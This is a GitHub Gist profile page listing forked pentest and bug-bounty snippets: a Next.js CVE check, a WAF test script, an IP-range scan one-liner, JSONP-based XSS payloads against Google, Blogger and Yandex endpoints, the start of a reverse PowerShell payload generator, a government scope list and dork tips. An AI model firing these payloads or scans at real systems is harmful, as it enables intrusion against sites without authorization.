Skip to content

Instantly share code, notes, and snippets.

View and0x00's full-sized avatar

and0x00

9 followers · 106 following
View GitHub Profile
@and0x00
and0x00 / CVE-2025-29927.bcheck
Created July 7, 2025 00:49 — forked from fourcube/CVE-2025-29927.bcheck
Burp BCheck for CVE-2025-29927 (Next.js middleware bypass)
metadata:
language: v2-beta
name: "CVE-2025-29927 - Next.js middleware bypass"
description: "Checks for differences in responses when using different x-middleware-subrequest header paths"
author: "Chris Grieger - blueredix.com"
tags: "next.js", "middleware"
run for each:
middleware_value = "pages/_middleware",
"middleware",
@and0x00
and0x00 / waf-smoke-test.sh
Created April 12, 2025 17:10 — forked from ridjex/waf-smoke-test.sh
Lightweight Bash script to test basic WAF (Web Application Firewall) protections against common SQL injection and XSS payloads. Use this to quickly assess your web application’s surface against low-hanging injection vulnerabilities.
#!/bin/bash
# 🚀 Discover More: Testing Your Firewall in 60 Seconds: A Lightweight WAF Testing Script That Anyone Can Use
# Learn how this script works and the best practices for WAF testing.
# Read the full article here:
# 👉 https://medium.com/@kochuraa/testing-your-firewall-in-60-seconds-a-lightweight-waf-testing-script-that-anyone-can-use-a7a725fefcb7
# Safe WAF Tester Script
# Usage: ./waf-smoke-test.sh <URL> [-o output.md] [-H "Header: Value"]
# Examples:
@and0x00
and0x00 / openssl_scan.sh
Last active February 17, 2025 00:58 — forked from LowOrbitSecurity/openssl_scan.sh
# Scan IP range
LOS_24_IP="ENTER_IP_TO_SCAN";IP=$(echo $LOS_24_IP | cut -d"." -f1,2,3);for i in $(seq 1 255); do NEW_IP=$(echo $IP.$i); (timeout .1 openssl s_client $NEW_IP 2>&1 | grep -q "connect:errno" && echo "$NEW_IP,up" 2>/dev/null) 2>/dev/null ;done
@and0x00
and0x00 / jsonbee.txt
Created October 3, 2024 16:16 — forked from Lopseg/jsonbee.txt
#Google.com:
"><script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>
"><script src="https://googleads.g.doubleclick.net/pagead/conversion/1036918760/wcm?callback=alert(1337)"></script>
"><script src="https://www.googleadservices.com/pagead/conversion/1070110417/wcm?callback=alert(1337)"></script>
"><script src="https://cse.google.com/api/007627024705277327428/cse/r3vs7b0fcli/queries/js?callback=alert(1337)"></script>
"><script src="https://accounts.google.com/o/oauth2/revoke?callback=alert(1337)"></script>
#Blogger.com:
"><script src="https://www.blogger.com/feeds/5578653387562324002/posts/summary/4427562025302749269?callback=alert(1337)"></script>
#Yandex:
"><script src="https://translate.yandex.net/api/v1.5/tr.json/detect?callback=alert(1337)"></script>
@and0x00
and0x00 / suspicious-extensions-rce.yaml
Created August 16, 2024 23:15 — forked from nullenc0de/suspicious-extensions-rce.yaml
id: suspicious-extensions-rce
info:
name: Suspicious File Extensions - Potential RCE
author: Nullenc0de
severity: medium
description: Detects files with potentially suspicious extensions that could be used for Remote Code Execution (RCE). Scan your AppData folder.
file:
- extensions:
@and0x00
and0x00 / favicon_hashes.txt
Created April 7, 2024 17:30
A list of favicon pre-computed hashes for various frameworks.
6399cc480d494bf1fcd7d16c42b1c11b:penguin
09b565a51e14b721a323f0ba44b2982a:Google web server
506190fc55ceaa132f1bc305ed8472ca:SocialText
2cc15cfae55e2bb2d85b57e5b5bc3371:PHPwiki (1.3.14) / gforge (4.6.99+svn6496) - wiki
389a8816c5b87685de7d8d5fec96c85b:XOOPS cms
f1876a80546b3986dbb79bad727b0374:NetScreen WebUI or 3Com Router
226ffc5e483b85ec261654fe255e60be:Netscape 4.1
b25dbe60830705d98ba3aaf0568c456a:Netscape iPlanet 6.0
41e2c893098b3ed9fc14b821a2e14e73:Netscape 6.0 (AOL)
a28ebcac852795fe30d8e99a23d377c1:SunOne 6.1
@and0x00
and0x00 / DOM3D.js
Created March 28, 2024 22:31 — forked from OrionReed/dom3d.js
3D DOM viewer, copy-paste this into your console to visualise the DOM topographically.
// 3D Dom viewer, copy-paste this into your console to visualise the DOM as a stack of solid blocks.
// You can also minify and save it as a bookmarklet (https://www.freecodecamp.org/news/what-are-bookmarklets/)
(() => {
const SHOW_SIDES = false; // color sides of DOM nodes?
const COLOR_SURFACE = true; // color tops of DOM nodes?
const COLOR_RANDOM = false; // randomise color?
const COLOR_HUE = 190; // hue in HSL (https://hslpicker.com)
const MAX_ROTATION = 180; // set to 360 to rotate all the way round
const THICKNESS = 20; // thickness of layers
const DISTANCE = 10000; // ¯\\_(ツ)_/¯
@and0x00
and0x00 / DutchGov.txt
Created August 4, 2023 18:08 — forked from random-robbie/DutchGov.txt
Dutch Gov - bug bounty scope - feel free to add more if you know they are in scope - taken from - https://www.communicatierijk.nl/vakkennis/r/rijkswebsites/verplichte-richtlijnen/websiteregister-rijksoverheid
http://www.rijksoverheid.nl
http://www.rivm.nl
http://coronadashboard.rijksoverheid.nl
http://www.nederlandwereldwijd.nl
http://www.government.nl
http://lci.rivm.nl
http://www.rvo.nl
http://www.defensie.nl
http://www.werkenvoornederland.nl
http://www.rijkswaterstaat.nl
@and0x00
and0x00 / mkpsrevshell.py
Created July 1, 2023 23:49 — forked from tothi/mkpsrevshell.py
reverse PowerShell cmdline payload generator (base64 encoded)
#!/usr/bin/env python3
#
# generate reverse powershell cmdline with base64 encoded args
#
import sys
import base64
def help():
print("USAGE: %s IP PORT" % sys.argv[0])
@and0x00
and0x00 / GoogleDorking.md
Created June 7, 2023 20:29 — forked from sundowndev/GoogleDorking.md
Google dork cheatsheet

Google dork cheatsheet

Search filters

Filter Description Example
allintext Searches for occurrences of all the keywords given. allintext:"keyword"
intext Searches for the occurrences of keywords all at once or one at a time. intext:"keyword"
inurl Searches for a URL matching one of the keywords. inurl:"keyword"
allinurl Searches for a URL matching all the keywords in the query. allinurl:"keyword"
intitle Searches for occurrences of keywords in title all or one. intitle:"keyword"